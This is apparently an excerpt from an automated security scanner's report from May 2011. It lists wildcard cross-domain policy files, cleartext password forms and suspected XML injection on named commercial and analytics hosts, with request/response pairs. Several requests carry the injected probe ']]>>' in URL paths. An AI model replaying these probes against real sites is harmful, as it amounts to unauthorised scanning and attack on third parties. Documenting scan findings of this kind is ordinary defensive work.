HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 730 Date: Mon, 16 May 2011 01:19:46 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.fingerhut |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.fingerhut.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:35 GMT Server: Omniture DC/2.0.0 xserver: www32 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.mcafee.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.mcafee.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:52 GMT Server: Omniture DC/2.0.0 xserver: www49 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.sonystyle |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.sonystyle.com |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:20:00 GMT Server: Omniture DC/2.0.0 xserver: www424 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.us.playstation |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:26:45 GMT Server: Omniture DC/2.0.0 xserver: www358 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.33across.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.33across.com |
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"335-1298012459000" Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT Content-Type: application/xml Content-Length: 335 Date: Mon, 16 May 2011 01:29:35 GMT Connection: close Server: 33XG1 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> </allow-from> <gr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:30:58 GMT Server: Apache Cache-Control: max-age=604800 Expires: Sun, 22 May 2011 21:30:58 GMT Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT ETag: "ff-4adbc4fc" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:53 GMT Server: Omniture DC/2.0.0 xserver: www10 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://w88.go.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: w88.go.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:27:17 GMT Server: Omniture DC/2.0.0 xserver: www381 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> ...[SNIP]... <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://localhost:50386 |
Path: | /hoyt/Sitefinity/Startup |
GET /hoyt/Sitefinity/Startup HTTP/1.1 Host: localhost:50386 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Cassini/4.1.1395.0 Date: Mon, 16 May 2011 00:10:29 GMT X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 15543 Connection: Close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><meta ht ...[SNIP]... <body onload="HideLoading()" onbeforeunload= <form method="post" action="Startup" onkeypress="javascript <div class="aspNetHidden"> ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:43 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 108383 Cache-Control: public, max-age=19338 Expires: Mon, 16 May 2011 07:05:34 GMT Date: Mon, 16 May 2011 01:43:16 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... </div>'; //learn step 1 var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions ...[SNIP]... </label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:40 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 106125 Cache-Control: public, max-age=19577 Expires: Mon, 16 May 2011 07:05:43 GMT Date: Mon, 16 May 2011 01:39:26 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... </div>'; //learn step 1 var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions ...[SNIP]... </label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.passporte |
Path: | /forums/ |
GET /forums/ HTTP/1.1 Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:31:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Set-Cookie: bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Set-Cookie: bblastactivity=0; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Set-Cookie: vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/ Content-Length: 162646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <td class="alt2" nowrap="nowrap" style="padding:0px"> <form action="http://www ...[SNIP]... <td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.viddler.com |
Path: | /file/7d63c65a/html5 |
GET /file/7d63c65a/html5 Host: www.viddler.com Proxy-Connection: keep-alive Referer: http://blog.us.plays Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Range: bytes=0- |
HTTP/1.1 500 Internal Server Error Server: nginx/0.6.32 Date: Sun, 15 May 2011 20:26:39 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive X-Viddler-Node: viddler_d Vary: Accept-Encoding Content-Length: 7614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; c ...[SNIP]... </a> <form action="/j_security_check <input type="text" name="j_username" id="login-username" size="10" class="dim"/> ...[SNIP]... <input type="text" class="dim" value="password" id="login-password-show"/ <a id="headerLoginSubmit" class="headerButton" href="#"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://api.ak.facebook |
Path: | /restserver.php |
GET /restserver.php?v=1.0 Host: api.ak.facebook.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Content-Type: text/javascript;charset Pragma: X-FB-Rev: 378427 X-FB-Server: 10.42.13.57 X-Cnection: close Content-Length: 850 Cache-Control: public, max-age=120 Expires: Mon, 16 May 2011 01:27:28 GMT Date: Mon, 16 May 2011 01:25:28 GMT Connection: close jsonp1305508793343('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://d1nh2vjpqpfnin |
Path: | /main/prod/utag.7001.js |
GET /main]]>>/prod/utag.7001.js?utv Host: d1nh2vjpqpfnin.cloudfront Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 403 Forbidden x-amz-request-id: E5928E2B22A7C323 x-amz-id-2: GcBE4Hsq6F1CjZP9wOLQ Content-Type: application/xml Date: Mon, 16 May 2011 01:35:12 GMT Server: AmazonS3 Age: 1 Content-Length: 231 X-Cache: Error from cloudfront X-Amz-Cf-Id: e02d5960d05abd229675 Via: 1.0 4552622032e7495f9882 Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://d1nh2vjpqpfnin |
Path: | /main/prod/utag.7001.js |
GET /main/prod]]>>/utag.7001.js?utv=ut3.0 Host: d1nh2vjpqpfnin.cloudfront Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 403 Forbidden x-amz-request-id: 95B3CCE9970C8CF7 x-amz-id-2: x4fZmVmWJL0UnnkLKC2j Content-Type: application/xml Date: Mon, 16 May 2011 01:35:14 GMT Server: AmazonS3 Age: 1 Content-Length: 231 X-Cache: Error from cloudfront X-Amz-Cf-Id: bb0979d7e1998ece82cf Via: 1.0 fb63ddec72f5ddb88546 Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://d1nh2vjpqpfnin |
Path: | /main/prod/utag.7001.js |
GET /main/prod/utag.7001.js]]>>?utv=ut3.0.201105091600 HTTP/1.1 Host: d1nh2vjpqpfnin.cloudfront Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 403 Forbidden x-amz-request-id: A7123AA90A614BF5 x-amz-id-2: G0q50YEwRLfOiIYjsIsjLdXG Content-Type: application/xml Date: Mon, 16 May 2011 01:35:17 GMT Server: AmazonS3 Content-Length: 231 X-Cache: Error from cloudfront X-Amz-Cf-Id: 0f5ef4cb25ce2dcef2bc Via: 1.0 c6e272614e0cac48002f Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e]]>>/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Mon, 16 May 2011 01:33:43 GMT Server: lighttpd/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677]]>>/s-2140.xgi?na_random Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Mon, 16 May 2011 01:33:45 GMT Server: lighttpd/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi]]>>?na_random=516841224&na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Mon, 16 May 2011 01:33:46 GMT Server: lighttpd/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform0.twitter |
Path: | /widgets/tweet_button |
GET /widgets]]>>/tweet_button.html?_ Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: k=173.193.214.243 |
HTTP/1.1 404 Not Found Content-Type: application/xml Content-Length: 294 Date: Mon, 16 May 2011 01:29:27 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform0.twitter |
Path: | /widgets/tweet_button |
GET /widgets/tweet_button Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: k=173.193.214.243 |
HTTP/1.1 404 Not Found Content-Type: application/xml Content-Length: 294 Date: Mon, 16 May 2011 01:29:28 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform1.twitter |
Path: | /widgets/tweet_button |
GET /widgets]]>>/tweet_button.html?_ Host: platform1.twitter.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: k=173.193.214.243 |
HTTP/1.1 404 Not Found Content-Type: application/xml Content-Length: 294 Date: Mon, 16 May 2011 01:29:27 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform1.twitter |
Path: | /widgets/tweet_button |
GET /widgets/tweet_button Host: platform1.twitter.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: k=173.193.214.243 |
HTTP/1.1 404 Not Found Content-Type: application/xml Content-Length: 294 Date: Mon, 16 May 2011 01:29:29 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://r.nexac.com |
Path: | /e/getdata.xgi |
GET /e]]>>/getdata.xgi?dt=br&pkey Host: r.nexac.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Mon, 16 May 2011 01:20:13 GMT Server: lighttpd/1.4.19 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://r.nexac.com |
Path: | /e/getdata.xgi |
GET /e/getdata.xgi]]>>?dt=br&pkey=vrie89u2mpteq Host: r.nexac.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Mon, 16 May 2011 01:20:16 GMT Server: lighttpd/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://store.playstation |
Path: | /external/index.vm |
GET /external/index.vm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: store.playstation.com Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 503 Service Temporarily Unavailable Date: Sun, 15 May 2011 20:31:19 GMT Server: Apache Last-Modified: Fri, 13 May 2011 23:06:34 GMT ETag: "982-4a3305b65d280" Accept-Ranges: bytes Content-Length: 2434 nnCoection: close Content-Type: text/html; charset=UTF-8 Connection: Keep-Alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Und ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.sonystyle.com Cookie: JSESSIONID=0000e Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Content-Length: 161 Date: Sun, 15 May 2011 21:20:23 GMT Connection: close Cache-Control: no-cache Pragma: no-cache <html><head><title |
Severity: | Medium |
Confidence: | Firm |
Host: | http://fingerhut.tt |
Path: | /m2/fingerhut/mbox |
GET /m2/fingerhut/mbox Host: fingerhut.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 1336 Date: Mon, 16 May 2011 01:27:04 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://mbox12.offermatica |
Path: | /m2/guitarcenter/mbox |
GET /m2/guitarcenter/mbox Host: mbox12.offermatica.com Proxy-Connection: keep-alive Referer: http://www.guitarcenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 5205 Date: Mon, 16 May 2011 01:40:27 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://sales.liveperson |
Path: | /hc/71737897/ |
GET /hc/71737897/?&visitor Host: sales.liveperson.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: HumanClickKEY=154731 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:20:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 15 May 2011 21:20:08 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({ ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://sony.tt.omtrdc.net |
Path: | /m2/sony/mbox/ajax |
